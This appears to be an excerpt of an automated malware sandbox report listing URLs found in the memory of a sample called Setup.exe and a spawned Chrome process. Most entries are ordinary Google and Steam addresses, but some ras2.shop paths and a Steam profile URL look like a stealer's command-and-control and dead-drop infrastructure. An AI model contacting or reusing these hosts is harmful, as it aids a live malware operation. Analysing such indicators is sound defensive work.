      Source: chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922510832.0000650803084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922793205.0000650801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922659890.0000650803030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
      Source: chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922510832.0000650803084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922793205.0000650801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922659890.0000650803030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
      Source: chrome.exe, 00000002.00000003.2632571633.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547579560.0000650800DB6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1990835189.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550182639.00006508012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550545654.0000650801305000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548838064.0000650800F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
      Source: chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547579560.0000650800DB6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885948549.0000650800A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
      Source: chrome.exe, 00000002.00000003.2632571633.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546068104.0000650800AD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1990835189.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
      Source: chrome.exe, 00000002.00000003.2632571633.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1990835189.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542562259.00006508002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885948549.0000650800A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
      Source: chrome.exe, 00000002.00000003.2632571633.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1990835189.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542562259.00006508002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
      Source: chrome.exe, 00000002.00000003.2632571633.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1990835189.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885948549.0000650800A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
      Source: chrome.exe, 00000002.00000002.3547161804.0000650800D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550545654.0000650801305000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3554449488.0000650802C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3541897646.000065080015C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730127919&target=OPTIMIZATION_TARGET_GEO
      Source: chrome.exe, 00000002.00000002.3547161804.0000650800D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550545654.0000650801305000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3554449488.0000650802C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730127962&target=OPTIMIZATION_TARGET_NOT
      Source: chrome.exe, 00000002.00000002.3549979705.00006508011BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550668799.0000650801329000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3555346320.00006508032AD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2203486373.00006508032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550545654.0000650801305000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548838064.0000650800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730214257&target=OPTIMIZATION_TARGET_CLI
      Source: chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547579560.0000650800DB6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885948549.0000650800A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
      Source: chrome.exe, 00000002.00000003.2632571633.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547579560.0000650800DB6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1990835189.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885948549.0000650800A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
      Source: chrome.exe, 00000002.00000002.3550634679.0000650801310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547297207.0000650800D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550182639.00006508012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550545654.0000650801305000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2134948941.000065080271E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548761590.0000650800F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
      Source: chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
      Source: chrome.exe, 00000002.00000002.3548509144.0000650800EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
      Source: chrome.exe, 00000002.00000002.3545483481.00006508009C7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
      Source: chrome.exe, 00000002.00000003.1889128782.000065080120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888826743.000065080040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889004039.00006508010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
      Source: chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549548116.0000650801038000.00000004.00000800.00020000.00000000.sdmp, chromecache_73.4.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
      Source: chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=truee
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: chrome.exe, 00000002.00000002.3545483481.00006508009C7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545335468.0000650800960000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830198421.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/Up
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/Up#p
      Source: Setup.exe, 00000000.00000003.1830198421.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371
      Source: Setup.exe, 00000000.00000003.1830198421.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371Qk
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: chrome.exe, 00000002.00000002.3541337974.0000650800030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win6
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
      Source: chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
      Source: chrome.exe, 00000002.00000002.3544674309.00006508007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544572535.0000650800788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
      Source: chrome.exe, 00000002.00000002.3544674309.00006508007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544572535.0000650800788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: chrome.exe, 00000002.00000003.1906108233.00006508002B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: chrome.exe, 00000002.00000003.2637755343.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2001447093.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680660089
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/pr
      Source: Setup.exe, Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089/badges
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089/inventory/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611996806600890
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barni
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barnif1575b64-8492-4e8b-b102-4d26e8c70371https:
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barnir5qt6tMozilla/5.0
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barniunknownf
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089dll2
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;E
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
